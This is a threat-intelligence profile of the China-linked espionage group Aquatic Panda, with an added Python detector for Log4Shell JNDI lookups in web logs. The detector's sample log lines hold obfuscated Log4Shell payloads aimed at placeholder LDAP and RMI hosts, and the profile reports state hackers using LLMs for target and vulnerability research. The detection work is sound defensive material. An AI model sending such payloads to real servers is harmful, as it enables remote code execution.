Aquatic Panda

Threat Actor Profile Updated 3 months ago
Aquatic Panda is CrowdStrike's name for a China-nexus adversary assessed to conduct state-backed cyber espionage; CrowdStrike describes a dual mission of intelligence collection and industrial espionage and places the start of its activity at least as early as May 2020. Other vendors track overlapping activity as Charcoal Typhoon (Microsoft), RedHotel (Recorded Future), Bronze University (Secureworks), and ControlX. Budworm is sometimes listed as a further alias, but that name belongs to the LuckyMouse / APT27 cluster (see the overlap table below), so treat that mapping as unconfirmed.

Two findings account for most of the recent reporting. In December 2021 CrowdStrike's OverWatch team disrupted an intrusion at an academic institution in which Aquatic Panda attempted to exploit Log4Shell (CVE-2021-44228, the Log4j JNDI lookup vulnerability) against a vulnerable VMware Horizon instance; the group was found in possession of a modified Log4Shell exploit, so its access to working exploit tooling is confirmed rather than merely suspected. Separately, Netskope Threat Labs ranked Aquatic Panda among the most active geopolitical (state-aligned) groups targeting users of the Netskope Security Cloud platform in the quarter covered by its report.

In February 2024 Microsoft and OpenAI reported terminating accounts used by five state-affiliated groups, two of them China-affiliated: Charcoal Typhoon (Aquatic Panda) and Maverick Panda (Microsoft's Salmon Typhoon). Across the two clusters the reported uses of the models were open-source research on target organisations and security tooling, identifying potential targets, generating code and debugging coding errors, vulnerability research, and translating technical papers. Microsoft characterised this as early-stage, incremental use of LLMs for productivity rather than a new attack capability and reported no significant LLM-enabled attacks. The same report named Forest Blizzard (APT28, Russia), Emerald Sleet (Kimsuky, North Korea), and Crimson Sandstorm (Imperial Kitten, Iran).

Adam Meyers, head of counter adversary operations at CrowdStrike, has singled the group out as a primary source of concern. Note that Aquatic Panda is an espionage actor, not a ransomware operator: the Netskope report that ranks it among geopolitical groups separately lists criminal groups such as TA505 and FIN7, which rely heavily on ransomware. The ransomware families and criminal groups listed under Associated Malware and Associated Threat Actors below most likely reflect co-mention in the same reports rather than tooling Aquatic Panda itself deploys.
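Because the profile only names Log4Shell in passing, here is the check a defender would actually run over web access logs when a Log4Shell-capable actor is in scope. This is an added example, not code from the profile page, CrowdStrike, or Netskope: it reverses the lookup-nesting tricks that were used to hide the literal string jndi from naive signature matching (${lower:j}, ${::-j}, ${env:X:-j}, URL encoding), then flags the lookup and the scheme it would dial out with. The log lines, IP addresses (documentation ranges) and field names are constructed for illustration.

```python
"""Flag Log4Shell-style JNDI lookups in web access logs, after de-obfuscation.

Added example; not taken from the threat-actor profile or any vendor report.
SAMPLE_LOGS below are constructed, not real telemetry.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Innermost Log4j 2 lookups attackers used to split the literal "jndi":
#   ${lower:J} / ${upper:j}   -> case-changed text
#   ${::-j}, ${env:NOPE:-j}   -> the default after ":-" (the lookup itself fails)
# Both patterns exclude '$', '{' and '}' inside, so they only match the
# innermost lookup; repeating them collapses the nesting from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Shape of a normalised payload: ${jndi:<scheme>:...}  (ldap, ldaps, rmi, dns, ...)
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)

# Constructed Apache-style access log lines (all IPs are documentation ranges).
SAMPLE_LOGS = [
    '203.0.113.5 - - [11/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:X:-i}:${lower:ldap}://198.51.100.7:1389/b}"',
    '203.0.113.12 - - [11/Dec/2021:03:14:13 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.8%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.5 - - [11/Dec/2021:03:14:15 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Undo URL encoding (up to twice) and collapse nested lookups.

    Each round rewrites only innermost lookups, so the loop stops as soon as a
    round changes nothing; max_rounds bounds pathological input. Benign lookups
    with no default, e.g. ${date:yyyy}, are left untouched.
    """
    for _ in range(2):  # payloads in access logs are often double-encoded
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per log line that carries a JNDI lookup once normalised."""
    findings: List[Dict[str, str]] = []
    for idx, line in enumerate(lines):
        normalized = normalize_lookups(line)
        match = _JNDI.search(normalized)
        if match:
            findings.append(
                {"line": idx, "scheme": match.group(1).lower(), "indicator": match.group(0)}
            )
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOGS):
        print(finding)
```

Lines 1, 2 and 3 of the sample are flagged (schemes ldap, ldap, rmi) while the benign ${date:yyyy} request is not; without the normalisation step only the first payload would match a plain "jndi" signature. Matching on the normalised string also gives you the scheme, which tells you which egress protocol (LDAP, RMI, DNS) to hunt for in firewall and DNS logs.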
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID (votes): Profile Description
Bronze University (1 vote): Bronze University, also known as Aquatic Panda, ControlX, RedHotel, and Earth Lusca, is a threat actor group believed to be a Chinese state-sponsored hacking operation. The group has been active since 2021, targeting government, aerospace, education, telecommunications, media, and research organizat
Charcoal Typhoon (1 vote): Charcoal Typhoon, a China-affiliated threat actor, has been identified as one of the state-backed groups using OpenAI's ChatGPT for malicious purposes. The group is known for focusing on tracking groups in Taiwan, Thailand, Mongolia, Malaysia, France, Nepal, and individuals globally that oppose Chin
RedHotel (1 vote): RedHotel, also known as Aquatic Panda, ControlX, and Bronze University, is a threat actor linked to Chinese state-sponsored cyber groups. It is part of a sophisticated network of espionage operations including RedAlpha, Poison Carp, and i-SOON, which are primarily involved in the theft of telecommun
Budworm (1 vote): Budworm, also known as LuckyMouse or APT27, is a threat actor that has been associated with various high-profile cyber attacks. This group has been found to utilize tools such as the Korplug backdoor, which is commonly used by multiple Advanced Persistent Threats (APTs) including Budworm and APT41,
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Netskope
Apt
Vulnerability
Ransomware
Exploits
Log4j
Associated Malware
ID (type, votes): Profile Description
REvil (Unspecified, 1 vote): REvil is a notorious ransomware family that infiltrates systems to disrupt operations and steal data. It operated on a Ransomware-as-a-Service (RaaS) model, which gained traction in 2020. In this model REvil was typically delivered by first-stage loaders such as Dridex and Goot
Clop (Unspecified, 1 vote): Clop (also written Cl0p) is a ransomware family known for its disruptive and damaging effects on computer systems. It typically arrives through malicious downloads, phishing emails, or compromised websites, often unbeknownst to the user. Once inside, Clop can steal personal information, disrupt o
Associated Threat Actors
ID (type, votes): Profile Description
FIN7 (Unspecified, 1 vote): FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security
DarkSide (Unspecified, 1 vote): DarkSide is a notable threat actor that emerged in the cybersecurity landscape with its advanced ransomware operations. In 2021, the group gained significant attention for its attack on the United States' largest oil pipeline, Colonial Pipeline, causing a temporary halt to all operations for three d
TA505 (Unspecified, 1 vote): TA505, also known as Cl0p Ransomware Gang and Lace Tempest, is a highly active and sophisticated cybercriminal group. The group has been associated with various high-profile cyber-attacks, demonstrating adaptability through a multi-vector approach to their operations. In June 2023, the U.S. Cybersec
Imperial Kitten (Unspecified, 1 vote): Imperial Kitten, also known as Tortoiseshell and UNC1549, is a significant threat actor identified by cybersecurity firms CrowdStrike and Mandiant. The group has been associated with various malicious activities, including the distribution of malware through strategic web compromise (SWC), and the use of IMAPLoader and other
Associated Vulnerabilities
No associations to display
Source Document References
Information about the Aquatic Panda threat actor was read from the documents in the corpus below (display limited to 20 results).
Source (created): Title
CERT-EU (5 months ago): iSoon's Secret APT Status Exposes China's Foreign Hacking Machination | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker | National Cyber Security Consulting
DARKReading (5 months ago): iSoon's Secret APT Status Exposes China's Foreign Hacking Machination
CERT-EU (5 months ago): Global AI Developers Need to Set Some Standards – Now
DARKReading (5 months ago): Microsoft, OpenAI: Nation-States Are Weaponizing AI in Cyberattacks
BankInfoSecurity (5 months ago): OpenAI and Microsoft Terminate State-Backed Hacker Accounts
CERT-EU (8 months ago): CyberTalk with Ray Canzanese
CERT-EU (9 months ago): Netskope Threat Labs report says highest percentage of cybercrime activity originates in Russia
CERT-EU (9 months ago): Criminal groups focus on Australia and US
MITRE (a year ago): AQUATIC PANDA in Possession of Log4Shell Exploit Tools | CrowdStrike